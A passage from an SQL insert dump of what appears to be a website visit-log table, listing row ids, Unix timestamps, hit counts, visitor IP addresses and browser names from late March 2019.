','other'),(405329,1553600317,1,1,0,0,'23.228.81.10','chrome'),(405330,1553600507,1,1,0,0,'91.196.178.189','chrome'),(405331,1553600664,1,1,0,0,'178.92.137.82','chrome'),(405332,1553601851,1,1,0,0,'195.78.252.35','chrome'),(405333,1553602129,2,2,0,0,'66.249.64.29','chrome'),(405334,1553602748,2,2,0,0,'66.249.64.30','chrome'),(405335,1553602752,1,1,0,0,'66.249.64.58','chrome'),(405336,1553602861,1,1,0,0,'66.249.64.60','chrome'),(405337,1553603038,1,1,0,0,'91.196.178.33','chrome'),(405338,1553603365,1,1,0,0,'91.237.247.164','chrome'),(405339,1553603552,1,1,0,0,'66.249.64.29','chrome'),(405340,1553603675,1,1,0,0,'91.196.178.189','chrome'),(405341,1553603823,1,1,0,0,'82.207.48.94','chrome'),(405342,1553604041,1,1,0,0,'78.111.186.78','chrome'),(405343,1553604045,1,1,0,0,'8.29.198.27','other'),(405344,1553604057,1,1,0,0,'8.29.198.26','other'),(405345,1553604179,1,1,0,0,'66.249.64.30','chrome'),(405346,1553604246,2,2,0,0,'66.249.64.60','chrome'),(405347,1553604333,1,1,0,0,'46.229.168.149','other'),(405348,1553604645,1,1,0,0,'91.229.240.133','chrome'),(405349,1553604736,1,1,0,0,'91.196.178.33','chrome'),(405350,1553604806,1,1,0,0,'46.229.168.152','other'),(405351,1553605848,1,1,0,0,'54.36.148.67','other'),(405352,1553605910,1,1,0,0,'54.36.148.185','other'),(405353,1553606144,1,1,0,0,'130.180.216.34','chrome'),(405354,1553606324,1,1,0,0,'54.36.148.14','other'),(405355,1553606746,1,1,0,0,'46.229.168.136','other'),(405356,1553606905,1,1,0,0,'54.36.150.88','other'),(405357,1553606913,1,1,0,0,'66.249.64.62','chrome'),(405358,1553606925,1,1,0,0,'46.229.168.133','other'),(405359,1553606928,1,1,0,0,'46.229.168.130','other'),(405360,1553606975,2,2,0,0,'66.249.64.29','chrome'),(405361,1553607010,1,1,0,0,'66.249.64.31','chrome'),(405362,1553607033,1,1,0,0,'66.249.64.30','chrome'),(405363,1553607089,1,1,0,0,'66.249.64.58','chrome'),(405364,1553607155,1,1,0,0,'95.163.255.45','other'),(405365,1553607628,1,1,0,0,'54.36.150.67','other'),(405366,1553607943,1,1,0,0,'54.36.149.33','other'),(405367,1553607993,1,1,0,0,'54.36.150.87','other'),(405368,1553608163,1,1,0,0,'180.76.15.29','other'),(405369,1553608533,1,1,0,0,'46.229.168.132','other'),(405370,1553608644,2,2,0,0,'82.207.48.94','chrome'),(405371,1553608783,1,1,0,0,'66.249.64.29','chrome'),(405372,1553608864,1,1,0,0,'54.36.148.94','other'),(405373,1553608900,1,1,0,0,'66.249.64.31','chrome'),(405374,1553609045,1,1,0,0,'66.249.64.62','chrome'),(405375,1553609125,1,1,0,0,'54.36.149.24','other'),(405376,1553609141,1,1,0,0,'46.229.168.153','other'),(405377,1553609205,1,1,0,0,'5.3.148.173','msie'),(405378,1553609212,1,1,0,0,'54.36.149.61','other'),(405379,1553609218,2,2,0,0,'66.249.64.30','chrome'),(405380,1553609472,1,1,0,0,'54.36.148.105','other'),(405381,1553609521,1,1,0,0,'207.46.13.91','other'),(405382,1553609706,3,3,0,0,'91.196.178.94','firefox'),(405383,1553610155,1,1,0,0,'46.229.168.161','other'),(405384,1553610239,1,1,0,0,'66.249.64.60','chrome'),(405385,1553610317,1,1,0,0,'54.36.150.179','other'),(405386,1553610473,1,1,0,0,'54.36.149.47','other'),(405387,1553610504,1,1,0,0,'54.36.148.197','other'),(405388,1553610617,2,2,0,0,'91.196.178.94','firefox'),(405389,1553610711,1,1,0,0,'54.36.150.89','other'),(405390,1553610858,1,1,0,0,'54.36.150.149','other'),(405391,1553610868,1,1,0,0,'91.196.178.90','firefox'),(405392,1553610881,2,2,0,0,'66.249.64.31','chrome'),(405393,1553610955,2,2,0,0,'66.249.64.29','chrome'),(405394,1553611300,1,1,0,0,'54.36.148.194','other'),(405395,1553611447,1,1,0,0,'91.196.178.61','chrome'),(405396,1553611574,1,1,0,0,'185.40.50.19','chrome'),(405397,1553611576,1,1,0,0,'66.249.64.30','chrome'),(405398,1553611600,1,1,0,0,'46.229.168.149','other'),(405399,1553611898,1,1,0,0,'157.55.39.208','other'),(405400,1553612210,2,2,0,0,'31.41.52.108','chrome'),(405401,1553612293,1,1,0,0,'46.229.168.152','other'),(405402,1553612420,1,1,0,0,'54.36.148.233','other'),(405403,1553612441,1,1,0,0,'54.36.150.146','other'),(405404,1553612459,1,1,0,0,'66.249.64.31','chrome'),(405405,1553612514,1,1,0,0,'54.36.148.205','other'),(405406,1553612702,2,2,0,0,'95.132.8.26','chrome'),(405407,1553612954,1,1,0,0,'54.36.150.140','other'),(405408,1553612999,1,1,0,0,'46.229.168.133','other'),(405409,1553613455,1,1,0,0,'54.36.150.184','other'),(405410,1553613572,1,1,0,0,'54.36.150.191','other'),(405411,1553613601,1,1,0,0,'46.229.168.146','other'),(405412,1553613734,1,1,0,0,'66.249.64.31','chrome'),(405413,1553613759,2,2,0,0,'66.249.64.29','chrome'),(405414,1553613972,1,1,0,0,'54.36.149.39','other'),(405415,1553614203,1,1,0,0,'54.36.148.123','other'),(405416,1553614536,1,1,0,0,'54.36.148.41','other'),(405417,1553614770,1,1,0,0,'87.250.224.65','other'),(405418,1553614820,1,1,0,0,'91.209.11.236','other'),(405419,1553614894,2,2,0,0,'8.29.198.26','other'),(405420,1553614977,1,1,0,0,'54.36.150.63','other'),(405421,1553614996,3,3,0,0,'5.45.207.79','other'),(405422,1553615119,2,2,0,0,'141.8.142.103','other'),(405423,1553615122,3,3,0,0,'5.45.207.19','other'),(405424,1553615293,1,1,0,0,'54.36.148.1','other'),(405425,1553615537,1,1,0,0,'207.46.13.54','other'),(405426,1553615644,1,1,0,0,'46.229.168.141','other'),(405427,1553615661,1,1,0,0,'54.36.148.88','other'),(405428,1553615712,1,1,0,0,'95.108.213.4','other'),(405429,1553615744,1,1,0,0,'87.250.224.65','other'),(405430,1553615860,1,1,0,0,'54.36.148.117','other'),(405431,1553615903,1,1,0,0,'54.36.148.105','other'),(405432,1553615905,2,2,0,0,'178.154.244.11','other'),(405433,1553615977,1,1,0,0,'66.249.64.30','chrome'),(405434,1553616090,2,2,0,0,'5.45.207.79','other'),(405435,1553616253,1,1,0,0,'54.36.149.66','other'),(405436,1553616663,1,1,0,0,'54.36.150.138','other'),(405437,1553616709,1,1,0,0,'66.249.64.29','chrome'),(405438,1553616898,1,1,0,0,'54.36.149.56','other'),(405439,1553616997,1,1,0,0,'5.45.207.79','other'),(405440,1553617154,1,1,0,0,'54.36.150.139','other'),(405441,1553617221,1,1,0,0,'178.154.244.11','other'),(405442,1553617268,1,1,0,0,'46.229.168.139','other'),(405443,1553617627,1,1,0,0,'95.163.255.47','other'),(405444,1553617706,1,1,0,0,'207.46.13.129','other'),(405445,1553617722,1,1,0,0,'207.46.13.12','other'),(405446,1553617839,1,1,0,0,'46.229.168.143','other'),(405447,1553617903,1,1,0,0,'66.249.64.60','chrome'),(405448,1553617950,1,1,0,0,'141.8.142.103','other'),(405449,1553618123,1,1,0,0,'54.36.150.37','other'),(405450,1553618156,1,1,0,0,'54.36.148.222','other'),(405451,1553618392,1,1,0,0,'54.36.148.119','other'),(405452,1553618444,1,1,0,0,'54.36.149.49','other'),(405453,1553618586,1,1,0,0,'54.36.148.94','other'),(405454,1553618621,1,1,0,0,'54.36.148.157','other'),(405455,1553618763,1,1,0,0,'66.249.64.29','chrome'),(405456,1553619201,1,1,0,0,'46.229.168.152','other'),(405457,1553619645,1,1,0,0,'66.249.64.31','chrome'),(405458,1553619724,1,1,0,0,'46.229.168.139','other'),(405459,1553619948,1,1,0,0,'180.76.15.28','other'),(405460,1553620161,9,9,0,0,'207.46.13.38','other'),(405461,1553620451,3,3,0,0,'207.46.13.40','other'),(405462,1553620458,1,1,0,0,'207.46.13.39','other'),(405463,1553620475,4,4,0,0,'207.46.13.37','other'),(405464,1553620687,1,1,0,0,'66.249.64.60','chrome'),(405465,1553620924,1,1,0,0,'66.249.64.62','chrome'),(405466,1553621045,1,1,0,0,'46.211.125.222','chrome'),(405467,1553621266,1,1,0,0,'54.36.150.84','other'),(405468,1553621301,1,1,0,0,'66.249.64.29','chrome'),(405469,1553621628,1,1,0,0,'66.249.64.31','chrome'),(405470,1553621677,4,4,0,0,'66.249.64.30','chrome'),(405471,1553621933,3,3,0,0,'207.46.13.38','other'),(405472,1553621948,1,1,0,0,'180.76.15.7','other'),(405473,1553622026,1,1,0,0,'109.74.154.72','chrome'),(405474,1553622222,1,1,0,0,'46.229.168.145','other'),(405475,1553622544,1,1,0,0,'66.249.64.29','chrome'),(405476,1553622656,1,1,0,0,'54.36.148.67','other'),(405477,1553623370,1,1,0,0,'13.66.139.0','other'),(405478,1553623535,1,1,0,0,'54.36.149.39','other'),(405479,1553623612,1,1,0,0,'54.36.150.5','other'),(405480,1553623854,3,3,0,0,'66.249.64.29','chrome'),(405481,1553623952,2,2,0,0,'66.249.64.30','chrome'),(405482,1553623986,1,1,0,0,'66.249.64.58','chrome'),(405483,1553624214,1,1,0,0,'54.36.150.177','other'),(405484,1553624500,1,1,0,0,'66.249.64.62','chrome'),(405485,1553625042,1,1,0,0,'54.36.149.86','other'),(405486,1553625129,1,1,0,0,'54.36.148.205','other'),(405487,1553625142,1,1,0,0,'207.46.13.39','other'),(405488,1553625356,1,1,0,0,'5.188.210.44','chrome'),(405489,1553625407,1,1,0,0,'207.46.13.40','other'),(405490,1553625514,1,1,0,0,'54.36.150.121','other'),(405491,1553625770,2,2,0,0,'8.29.198.26','other'),(405492,1553625819,2,2,0,0,'5.45.207.19','other'),(405493,1553625830,3,3,0,0,'66.249.64.29','chrome'),(405494,1553626096,1,1,0,0,'141.8.142.103','other'),(405495,1553626228,1,1,0,0,'46.211.131.139','chrome'),(405496,1553626387,1,1,0,0,'54.36.150.108','other'),(405497,1553626444,1,1,0,0,'54.36.148.234','other'),(405498,1553626467,1,1,0,0,'54.36.148.131','other'),(405499,1553626597,1,1,0,0,'66.249.64.58','chrome'),(405500,1553626908,1,1,0,0,'54.36.148.84','other'),(405501,1553626942,1,1,0,0,'54.36.148.161','other'),(405502,1553627128,1,1,0,0,'54.36.150.28','other'),(405503,1553627161,1,1,0,0,'54.36.149.48','other'),(405504,1553627202,1,1,0,0,'87.250.224.65','other'),(405505,1553627211,2,2,0,0,'95.108.213.4','other'),(405506,1553627222,1,1,0,0,'178.154.244.11','other'),(405507,1553627554,1,1,0,0,'54.36.148.226','other'),(405508,1553627767,3,3,0,0,'141.8.142.103','other'),(405509,1553627770,1,1,0,0,'141.8.183.23','other'),(405510,1553627868,1,1,0,0,'46.229.168.151','other'),(405511,1553627946,2,2,0,0,'5.45.207.79','other'),(405512,1553628524,1,1,0,0,'54.36.148.128','other'),(405513,1553628563,1,1,0,0,'66.249.64.29','chrome'),(405514,1553628742,1,1,0,0,'54.36.150.106','other'),(405515,1553628776,1,1,0,0,'46.229.168.161','other'),(405516,1553628834,1,1,0,0,'54.36.148.80','other'),(405517,1553628872,1,1,0,0,'5.45.207.79','other'),(405518,1553628884,1,1,0,0,'46.229.168.138','other'),(405519,1553628890,1,1,0,0,'54.36.149.80','other'),(405520,1553629017,1,1,0,0,'46.229.168.130','other'),(405521,1553629263,1,1,0,0,'46.229.168.149','other'),(405522,1553629274,1,1,0,0,'207.46.13.38','other'),(405523,1553629567,1,1,0,0,'5.45.207.19','other'),(405524,1553629731,1,1,0,0,'54.36.150.101','other'),(405525,1553629937,1,1,0,0,'54.36.148.41','other'),(405526,1553630022,1,1,0,0,'54.36.148.66','other'),(405527,1553630105,1,1,0,0,'54.36.148.0','other'),(405528,1553630278,1,1,0,0,'66.249.64.31','chrome'),(405529,1553630536,1,1,0,0,'93.126.92.122','chrome'),(405530,1553630541,1,1,0,0,'54.36.148.95','other'),(405531,1553630598,1,1,0,0,'54.36.148.140','other'),(405532,1553630878,1,1,0,0,'54.36.150.187','other'),(405533,1553631263,1,1,0,0,'46.229.168.136','other'),(405534,1553631313,1,1,0,0,'46.229.168.130','other'),(405535,1553631321,1,1,0,0,'54.36.148.141','other'),(405536,1553631423,1,1,0,0,'54.36.150.114','other'),(405537,1553631503,1,1,0,0,'54.36.149.40','other'),(405538,1553631604,1,1,0,0,'40.77.167.66','other'),(405539,1553632001,1,1,0,0,'54.36.150.175','other'),(405540,1553632690,1,1,0,0,'54.36.149.26','other'),(405541,1553632771,1,1,0,0,'66.249.64.62','chrome'),(405542,1553632852,1,1,0,0,'207.46.13.39','other'),(405543,1553633954,1,1,0,0,'193.106.30.98','firefox'),(405544,1553634255,1,1,0,0,'95.163.255.46','other'),(405545,1553634414,1,1,0,0,'54.36.148.196','other'),(405546,1553634762,1,1,0,0,'54.36.150.158','other'),(405547,1553634971,1,1,0,0,'54.36.150.41','other'),(405548,1553635184,1,1,0,0,'66.249.64.62','chrome'),(405549,1553635271,1,1,0,0,'54.36.148.108','other'),(405550,1553635522,1,1,0,0,'54.36.149.54','other'),(405551,1553635674,1,1,0,0,'207.46.13.12','other'),(405552,1553635711,1,1,0,0,'54.36.148.88','other'),(405553,1553635720,1,1,0,0,'54.36.148.73','other'),(405554,1553635830,6,6,0,0,'5.45.207.79','other'),(405555,1553635866,1,1,0,0,'46.229.168.152','other'),(405556,1553635984,3,3,0,0,'5.45.207.19','other'),(405557,1553636010,1,1,0,0,'87.250.224.47','other'),(405558,1553636022,1,1,0,0,'54.36.150.119','other'),(405559,1553636024,1,1,0,0,'37.9.113.20','other'),(405560,1553636084,1,1,0,0,'54.36.150.48','other'),(405561,1553636150,3,3,0,0,'178.154.244.11','other'),(405562,1553636272,3,3,0,0,'141.8.142.103','other'),(405563,1553636372,2,2,0,0,'95.108.213.4','other'),(405564,1553636416,1,1,0,0,'54.36.150.91','other'),(405565,1553636626,1,1,0,0,'8.29.198.27','other'),(405566,1553636627,1,1,0,0,'8.29.198.25','other'),(405567,1553636900,1,1,0,0,'5.45.207.79','other'),(405568,1553637033,1,1,0,0,'54.36.149.9','other'),(405569,1553637072,1,1,0,0,'54.36.148.245','other'),(405570,1553637405,1,1,0,0,'54.36.148.19','other'),(405571,1553637817,2,2,0,0,'66.249.64.29','chrome'),(405572,1553638025,2,2,0,0,'66.249.64.30','chrome'),(405573,1553638178,1,1,0,0,'54.36.148.89','other'),(405574,1553638217,1,1,0,0,'46.229.168.130','other'),(405575,1553638365,1,1,0,0,'66.249.64.31','chrome'),(405576,1553638856,1,1,0,0,'54.36.148.45','other'),(405577,1553639145,1,1,0,0,'157.55.39.233','other'),(405578,1553639263,1,1,0,0,'66.249.64.30','chrome'),(405579,1553639270,1,1,0,0,'157.55.39.107','other'),(405580,1553639278,1,1,0,0,'46.229.168.151','other'),(405581,1553639302,1,1,0,0,'157.55.39.232','other'),(405582,1553639749,1,1,0,0,'157.55.39.89','other'),(405583,1553639783,1,1,0,0,'54.36.150.75','other'),(405584,1553639836,1,1,0,0,'54.36.150.67','other'),(405585,1553639921,1,1,0,0,'54.36.149.99','other'),(405586,1553640019,1,1,0,0,'54.36.150.27','other'),(405587,1553640020,1,1,0,0,'178.154.244.11','other'),(405588,1553640175,1,1,0,0,'54.36.148.87','other'),(405589,1553640396,1,1,0,0,'54.36.148.117','other'),(405590,1553640666,1,1,0,0,'54.36.148.64','other'),(405591,1553641083,1,1,0,0,'54.36.148.100','other'),(405592,1553641275,1,1,0,0,'46.229.168.132','other'),(405593,1553641383,1,1,0,0,'46.229.168.143','other'),(405594,1553641416,1,1,0,0,'54.36.148.212','other'),(405595,1553641571,1,1,0,0,'54.36.148.103','other'),(405596,1553641719,1,1,0,0,'40.77.167.61','other'),(405597,1553641727,1,1,0,0,'184.94.240.92','firefox'),(405598,1553642232,1,1,0,0,'46.229.168.161','other'),(405599,1553642545,1,1,0,0,'54.36.150.189','other'),(405600,1553642917,1,1,0,0,'66.249.66.138','chrome'),(405601,1553643135,1,1,0,0,'157.55.39.10','other'),(405602,1553643346,1,1,0,0,'54.36.150.101','other'),(405603,1553643695,1,1,0,0,'66.249.66.136','chrome'),(405604,1553644081,1,1,0,0,'54.36.149.38','other'),(405605,1553644186,1,1,0,0,'66.249.66.134','chrome'),(405606,1553644627,1,1,0,0,'54.36.148.93','other'),(405607,1553645175,1,1,0,0,'66.249.66.68','chrome'),(405608,1553645475,2,2,0,0,'46.229.168.150','other'),(405609,1553645902,2,2,0,0,'66.249.66.136','chrome'),(405610,1553646071,1,1,0,0,'141.8.142.103','other'),(405611,1553646305,1,1,0,0,'54.36.148.79','other'),(405612,1553646597,1,1,0,0,'91.196.178.36','chrome'),(405613,1553646658,1,1,0,0,'66.249.66.64','chrome'),(405614,1553646733,1,1,0,0,'178.154.244.11','other'),(405615,1553646800,1,1,0,0,'54.36.149.76','other'),(405616,1553646880,1,1,0,0,'5.196.87.172','other'),(405617,1553646906,1,1,0,0,'54.36.150.160','other'),(405618,1553647018,1,1,0,0,'46.229.168.152','other'),(405619,1553647251,1,1,0,0,'54.36.148.127','other'),(405620,1553647476,2,2,0,0,'8.29.198.25','other'),(405621,1553647748,1,1,0,0,'66.249.66.138','chrome'),(405622,1553648496,2,2,0,0,'46.229.168.132','other'),(405623,1553649236,1,1,0,0,'54.36.149.19','other'),(405624,1553649653,1,1,0,0,'54.36.148.39','other'),(405625,1553650092,2,2,0,0,'207.46.13.148','other'),(405626,1553650212,1,1,0,0,'66.249.66.136','chrome'),(405627,1553650609,1,1,0,0,'54.36.149.71','other'),(405628,1553650854,1,1,0,0,'54.36.148.247','other'),(405629,1553651565,1,1,0,0,'54.36.149.34','other'),(405630,1553651862,1,1,0,0,'207.46.13.150','other'),(405631,1553652669,1,1,0,0,'54.36.148.164','other'),(405632,1553652746,1,1,0,0,'54.36.148.254','other'),(405633,1553652747,1,1,0,0,'54.36.148.99','other'),(405634,1553652754,1,1,0,0,'66.249.66.134','chrome'),(405635,1553652888,1,1,0,0,'46.229.168.143','other'),(405636,1553652893,1,1,0,0,'54.36.148.113','other'),(405637,1553652943,1,1,0,0,'54.36.150.39','other'),(405638,1553653161,2,2,0,0,'66.249.66.138','chrome'),(405639,1553653308,1,1,0,0,'46.229.168.137','other'),(405640,1553653513,1,1,0,0,'54.36.150.81','other'),(405641,1553654116,1,1,0,0,'54.36.148.37','other'),(405642,1553654216,1,1,0,0,'46.229.168.154','other'),(405643,1553654288,1,1,0,0,'54.36.148.80','other'),(405644,1553654322,1,1,0,0,'54.36.149.46','other'),(405645,1553654473,1,1,0,0,'54.36.150.27','other'),(405646,1553654594,1,1,0,0,'209.17.96.26','other'),(405647,1553654735,1,1,0,0,'109.74.154.72','chrome'),(405648,1553654953,1,1,0,0,'66.249.66.136','chrome'),(405649,1553655025,1,1,0,0,'54.36.150.159','other'),(405650,1553655069,1,1,0,0,'66.249.66.64','chrome'),(405651,1553655992,1,1,0,0,'54.36.149.96','other'),(405652,1553656089,1,1,0,0,'66.249.66.134','chrome'),(405653,1553656203,1,1,0,0,'54.36.148.152','other'),(405654,1553656471,1,1,0,0,'54.36.149.37','other'),(405655,1553656526,1,1,0,0,'54.36.150.152','other'),(405656,1553657045,1,1,0,0,'40.77.167.118','other'),(405657,1553657062,1,1,0,0,'46.229.168.161','other'),(405658,1553657083,1,1,0,0,'40.77.167.120','other'),(405659,1553657324,1,1,0,0,'54.36.150.140','other'),(405660,1553657381,1,1,0,0,'54.36.150.102','other'),(405661,1553657533,1,1,0,0,'46.229.168.144','other'),(405662,1553657713,1,1,0,0,'54.36.149.51','other'),(405663,1553657728,1,1,0,0,'54.36.149.107','other'),(405664,1553657990,2,2,0,0,'66.249.66.134','chrome'),(405665,1553658080,2,2,0,0,'178.154.244.11','other'),(405666,1553658117,2,2,0,0,'5.45.207.79','other'),(405667,1553658160,1,1,0,0,'54.36.148.34','other'),(405668,1553658231,1,1,0,0,'37.9.113.148','other'),(405669,1553658319,1,1,0,0,'87.250.224.47','other'),(405670,1553658333,1,1,0,0,'8.29.198.25','other'),(405671,1553658336,1,1,0,0,'8.29.198.26','other'),(405672,1553658562,1,1,0,0,'54.36.149.74','other'),(405673,1553658808,1,1,0,0,'54.36.150.33','other'),(405674,1553658903,1,1,0,0,'141.8.183.23','other'),(405675,1553658922,1,1,0,0,'37.9.113.103','other'),(405676,1553658999,1,1,0,0,'178.154.244.11','other'),(405677,1553659031,1,1,0,0,'37.9.113.20','other'),(405678,1553659075,2,2,0,0,'54.187.122.236','chrome'),(405679,1553659100,2,2,0,0,'66.249.66.136','chrome'),(405680,1553659116,1,1,0,0,'46.229.168.132','other'),(405681,1553659235,1,1,0,0,'157.55.39.88','other'),(405682,1553659316,1,1,0,0,'54.36.148.191','other'),(405683,1553659538,1,1,0,0,'54.36.148.76','other'),(405684,1553659604,1,1,0,0,'46.229.168.146','other'),(405685,1553659694,1,1,0,0,'157.55.39.93','other'),(405686,1553659737,1,1,0,0,'5.45.207.19','other'),(405687,1553659950,1,1,0,0,'5.45.207.79','other'),(405688,1553661174,1,1,0,0,'157.55.39.163','other'),(405689,1553661264,1,1,0,0,'46.229.168.149','other'),(405690,1553661494,1,1,0,0,'5.45.207.19','other'),(405691,1553661743,1,1,0,0,'5.45.207.79','other'),(405692,1553662106,1,1,0,0,'207.46.13.26','other'),(405693,1553662175,1,1,0,0,'91.196.178.133','firefox'),(405694,1553662211,1,1,0,0,'46.229.168.141','other'),(405695,1553662432,1,1,0,0,'95.108.213.4','other'),(405696,1553662800,1,1,0,0,'188.163.18.139','chrome'),(405697,1553663031,1,1,0,0,'141.8.142.103','other'),(405698,1553666176,1,1,0,0,'66.249.66.136','chrome'),(405699,1553666890,1,1,0,0,'37.52.154.15','chrome'),(405700,1553667127,1,1,0,0,'95.163.255.46','other'),(405701,1553667398,1,1,0,0,'66.249.66.136','chrome'),(405702,1553667701,1,1,0,0,'95.132.30.187','chrome'),(405703,1553667806,1,1,0,0,'40.77.167.63','other'),(405704,1553667815,1,1,0,0,'42.236.10.84','chrome'),(405705,1553667831,1,1,0,0,'66.249.66.134','chrome'),(405706,1553667843,2,2,0,0,'42.236.10.92','chrome'),(405707,1553667850,1,1,0,0,'180.163.220.68','chrome'),(405708,1553667854,1,1,0,0,'180.163.220.66','chrome'),(405709,1553668018,1,1,0,0,'42.236.10.106','other'),(405710,1553668155,1,1,0,0,'42.236.10.124','other'),(405711,1553668374,1,1,0,0,'185.220.100.252','other'),(405712,1553668586,1,1,0,0,'91.196.178.180','firefox'),(405713,1553669182,2,2,0,0,'8.29.198.25','other'),(405714,1553669281,1,1,0,0,'40.77.167.63','other'),(405715,1553670189,1,1,0,0,'91.196.178.93','chrome'),(405716,1553670456,1,1,0,0,'95.132.4.197','firefox'),(405717,1553670631,2,2,0,0,'66.249.66.136','chrome'),(405718,1553670708,1,1,0,0,'87.250.224.65','other'),(405719,1553670755,2,2,0,0,'5.45.207.19','other'),(405720,1553670935,1,1,0,0,'141.8.142.108','other'),(405721,1553671063,2,2,0,0,'5.45.207.79','other'),(405722,1553671064,1,1,0,0,'37.52.154.15','chrome'),(405723,1553671118,1,1,0,0,'66.249.66.66','chrome'),(405724,1553671180,1,1,0,0,'66.249.66.134','chrome'),(405725,1553671201,1,1,0,0,'13.66.139.0','other'),(405726,1553671302,1,1,0,0,'87.250.224.47','other'),(405727,1553671329,3,3,0,0,'178.154.244.11','other'),(405728,1553671582,2,2,0,0,'141.8.142.103','other'),(405729,1553671584,1,1,0,0,'40.77.167.63','other'),(405730,1553671762,1,1,0,0,'95.108.213.4','other'),(405731,1553672074,1,1,0,0,'37.9.113.148','other'),(405732,1553672414,1,1,0,0,'95.163.255.48','other'),(405733,1553672418,1,1,0,0,'5.45.207.19','other'),(405734,1553672518,1,1,0,0,'66.249.66.136','chrome'),(405735,1553672606,1,1,0,0,'46.229.168.144','other'),(405736,1553672664,1,0,1,0,'66.249.66.138',''),(405737,1553672875,1,1,0,0,'46.229.168.148','other'),(405738,1553673014,1,1,0,0,'46.229.168.161','other'),(405739,1553673146,1,1,0,0,'46.229.168.129','other'),(405740,1553673701,1,1,0,0,'46.229.168.145','other'),(405741,1553673857,1,1,0,0,'46.229.168.141','other'),(405742,1553674076,2,2,0,0,'66.249.66.138','chrome'),(405743,1553674161,1,1,0,0,'207.46.13.112','other'),(405744,1553674162,1,1,0,0,'66.249.66.64','chrome'),(405745,1553674373,1,0,1,0,'51.68.152.26',''),(405746,1553674411,1,1,0,0,'46.229.168.154','other'),(405747,1553674434,1,1,0,0,'46.229.168.136','other'),(405748,1553674510,1,1,0,0,'66.249.66.68','chrome'),(405749,1553674602,1,1,0,0,'46.219.121.34','chrome'),(405750,1553675426,1,1,0,0,'141.8.183.23','other'),(405751,1553676498,1,1,0,0,'91.196.178.65','chrome'),(405752,1553676683,1,1,0,0,'5.196.87.172','other'),(405753,1553677395,1,1,0,0,'66.249.66.136','chrome'),(405754,1553677747,1,1,0,0,'95.163.255.46','other'),(405755,1553678416,1,1,0,0,'157.55.39.4','other'),(405756,1553678437,1,1,0,0,'5.196.87.172','other'),(405757,1553678477,1,1,0,0,'207.46.13.112','other'),(405758,1553679804,2,2,0,0,'40.77.167.181','other'),(405759,1553679857,1,1,0,0,'66.249.66.138','chrome'),(405760,1553680031,2,2,0,0,'8.29.198.27','other'),(405761,1553680302,1,1,0,0,'66.249.66.66','chrome'),(405762,1553680927,1,1,0,0,'66.249.66.134','chrome'),(405763,1553680966,1,1,0,0,'91.196.178.93','chrome'),(405764,1553681014,1,1,0,0,'91.196.177.46','firefox'),(405765,1553681150,3,3,0,0,'66.249.66.138','chrome'),(405766,1553681243,1,1,0,0,'46.229.168.129','other'),(405767,1553681549,2,2,0,0,'95.213.141.126','opera'),(405768,1553681980,1,1,0,0,'46.229.168.154','other'),(405769,1553682414,2,2,0,0,'78.111.185.191','chrome'),(405770,1553682677,1,1,0,0,'66.249.66.138','chrome'),(405771,1553684185,1,1,0,0,'66.249.66.134','chrome'),(405772,1553684452,1,1,0,0,'157.55.39.124','other'),(405773,1553684831,1,1,0,0,'66.249.66.136','chrome'),(405774,1553684950,1,1,0,0,'176.31.106.57','firefox'),(405775,1553685526,1,1,0,0,'157.55.39.238','other'),(405776,1553685902,1,1,0,0,'46.229.168.137','other'),(405777,1553686034,1,1,0,0,'66.249.66.138','chrome'),(405778,1553686575,1,1,0,0,'66.249.66.134','chrome'),(405779,1553686889,1,1,0,0,'66.249.66.66','chrome'),(405780,1553687011,1,1,0,0,'66.249.66.68','chrome'),(405781,1553687238,1,1,0,0,'207.46.13.210','other'),(405782,1553687482,2,2,0,0,'66.249.66.136','chrome'),(405783,1553688462,1,1,0,0,'66.249.66.68','chrome'),(405784,1553689106,1,1,0,0,'66.249.66.134','chrome'),(405785,1553689135,1,1,0,0,'207.46.13.112','other'),(405786,1553689270,1,1,0,0,'207.46.13.210','other'),(405787,1553689611,1,1,0,0,'89.252.21.52','other'),(405788,1553689770,1,1,0,0,'157.55.39.124','other'),(405789,1553690571,1,1,0,0,'5.45.207.79','other'),(405790,1553690572,1,1,0,0,'37.9.113.148','other'),(405791,1553690847,1,1,0,0,'95.134.8.28','chrome'),(405792,1553690877,1,1,0,0,'8.29.198.26','other'),(405793,1553690880,1,1,0,0,'207.46.13.210','other'),(405794,1553690885,1,1,0,0,'8.29.198.25','other'),(405795,1553691156,2,2,0,0,'157.55.39.124','other'),(405796,1553691624,1,1,0,0,'91.196.177.15','chrome'),(405797,1553692161,1,1,0,0,'66.249.66.138','chrome'),(405798,1553692176,1,1,0,0,'66.249.66.134','chrome'),(405799,1553692207,1,1,0,0,'46.229.168.145','other'),(405800,1553692899,1,1,0,0,'91.196.178.41','chrome'),(405801,1553693134,1,1,0,0,'213.108.45.138','firefox'),(405802,1553693334,1,1,0,0,'66.249.66.68','chrome'),(405803,1553694034,1,1,0,0,'66.249.66.64','chrome'),(405804,1553694151,1,1,0,0,'66.249.66.136','chrome'),(405805,1553694347,1,1,0,0,'95.108.213.4','other'),(405806,1553694928,1,1,0,0,'141.8.142.103','other'),(405807,1553695021,1,1,0,0,'87.250.224.65','other'),(405808,1553695102,2,2,0,0,'207.46.13.108','other'),(405809,1553695286,1,1,0,0,'94.100.221.234','chrome'),(405810,1553695423,1,1,0,0,'46.229.168.148','other'),(405811,1553695604,1,1,0,0,'91.196.178.93','chrome'),(405812,1553696532,1,1,0,0,'46.229.168.136','other'),(405813,1553697297,1,1,0,0,'91.196.178.66','chrome'),(405814,1553697422,1,1,0,0,'93.171.225.26','chrome'),(405815,1553698478,2,2,0,0,'66.249.66.136','chrome'),(405816,1553698677,1,1,0,0,'66.249.66.138','chrome'),(405817,1553699981,1,1,0,0,'66.249.66.136','chrome'),(405818,1553700085,1,1,0,0,'66.249.66.134','chrome'),(405819,1553700350,1,1,0,0,'66.249.66.66','chrome'),(405820,1553700550,1,1,0,0,'91.196.178.133','chrome'),(405821,1553700573,1,1,0,0,'42.236.10.78','chrome'),(405822,1553700646,3,3,0,0,'66.249.66.138','chrome'),(405823,1553701126,1,1,0,0,'207.46.13.112','other'),(405824,1553701303,1,1,0,0,'66.249.66.136','chrome'),(405825,1553701673,1,1,0,0,'40.77.167.73','other'),(405826,1553701747,2,2,0,0,'8.29.198.27','other'),(405827,1553701993,1,1,0,0,'66.249.66.134','chrome'),(405828,1553702213,1,1,0,0,'46.229.168.150','other'),(405829,1553702282,1,1,0,0,'176.36.136.36','chrome'),(405830,1553702325,1,1,0,0,'46.229.168.141','other'),(405831,1553702537,1,1,0,0,'13.66.139.0','other'),(405832,1553702774,1,1,0,0,'37.214.2.123','chrome'),(405833,1553703239,1,1,0,0,'141.8.142.103','other'),(405834,1553703247,2,2,0,0,'66.249.66.134','chrom